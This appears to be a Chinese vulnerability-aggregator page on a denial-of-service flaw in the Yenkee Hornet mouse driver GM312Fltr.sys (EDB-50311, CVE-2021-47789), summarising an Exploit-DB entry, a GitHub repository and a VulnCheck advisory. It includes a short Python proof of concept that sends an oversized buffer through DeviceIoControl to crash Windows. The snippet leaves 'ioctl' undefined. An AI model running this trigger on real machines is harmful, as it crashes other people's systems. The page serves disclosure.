# Yenkee Hornet 鼠标驱动拒绝服务漏洞
N/A
是否为 Web 类漏洞: 未知
判断理由:
| # | POC 描述 | 源链接 | 神龙链接 |
|---|
标题: Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial of Service (PoC) - Windows dos Exploit -- 🔗来源链接
标签:exploit
神龙速读:
### 关键信息摘要
#### 漏洞概述
- **EDB-ID**: 50311
- **CVE**: N/A
- **标题**: Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial of Service (PoC)
- **类型**: DOS (拒绝服务)
- **平台**: Windows
- **日期**: 2021-09-21
- **作者**: QUADR0N RESEARCH LAB
- **测试环境**: Windows 10 x64 ENGLISH Professional
#### 漏洞细节
- **漏洞模块**: GM312Fltr.sys
- **错误代码**: 0x000000f7 (DRIVER_OVERRAN_STACK_BUFFER)
- **描述**: 驱动程序越界访问了栈上的缓冲区,可能导致恶意用户控制机器。
#### 漏洞代码示例
```python
import ctypes
from ctypes import *
from itertools import product
# 漏洞利用代码示例
kernel32 = windll.kernel32
hevDevice = kernel32.CreateFileA("\\\\.\\GM312Fltr", 0xC0000000, 0, None, 0x3, 0, None)
if not hevDevice or hevDevice == -1:
print("Not Win! Sorry!")
else:
print("OPENED!")
buf = 'A' * 2000
bufLength = 2000
kernel32.DeviceIoControl(hevDevice, ioctl, buf, bufLength, None, 0, byref(c_ulong()), None)
```
#### 调试信息
- **Bugcheck Analysis**:
- **Fatal System Error**: 0x000000f7
- **详细描述**: 驱动程序越界访问了栈上的缓冲区,可能允许恶意用户获取机器的控制权。
- **Call Site**: 多个函数调用栈,具体涉及`nt!DbgBreakPointWithStatus`, `GM312Fltr+0xea7`等。
标题: Quality accessories | Yenkee | Yenkee -- 🔗来源链接
标签:product
神龙速读:
由于您提供的图片中只包含一个黄色的几何图案,没有文字、链接或其他可读信息,因此无法从这个图片提取关于漏洞的关键信息。通常,关于漏洞的信息应包含漏洞的描述、ID、影响范围、利用方式、修复建议等具体内容。如果您能提供包含具体信息的截图,我可以帮助您提取和总结关键信息。
如果您有关于这张图片的其他问题或需要进一步的帮助,请告诉我!
标题: Kernel_Driver_bugs/GM312Fltr at main · Quadron-Research-Lab/Kernel_Driver_bugs · GitHub -- 🔗来源链接
标签:technical-descriptionexploit
神龙速读:
### 关键漏洞信息
- **Repository**: `Quadron-Research-Lab / Kernel_Driver_bugs`
- **Commit Message**: "Delete a"
- **Commit Time**: 5 years ago
- **Files in Folder**: `GM312Filtr`
- `GM312Filtr.sys` (Driver File)
- `GM312Filtr_PoC.py` (Proof of Concept Script)
- `Gm312Filtr_bugcheck_analysis.txt` (Bug Check Analysis File)
- **Other Vulnerable Drivers**: Also contains directories for other drivers like `Hyper-V_VMSwitch.sys`, `Logitech_Gaming`, etc.
标题: Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial of Service | Advisories | VulnCheck -- 🔗来源链接
标签:third-party-advisory
神龙速读:
### 漏洞关键信息
#### Severity
- Medium
#### Date
- January 15, 2026
#### Affecting
- Yenkee Hornet Gaming Mouse all versions
#### Vulnerability
- CVE-2021-47789
- CWE-121 Stack-based Buffer Overflow
#### References
- [ExploitDB-50311](link)
- [Yenkee Vendor Webpage](link)
- [Quadron Research Lab Kernel Driver Bugs Repository](link)
#### Credit
- Quadron Research Lab
#### Description
- Yenkee Hornet Gaming Mouse driver GM312Fltr.sys contains a buffer overrun vulnerability that allows attackers to crash the system by sending oversized input. Attackers can exploit the driver by sending a 2000-byte buffer through DeviceIoControl to trigger a kernel-level system crash.
暂无评论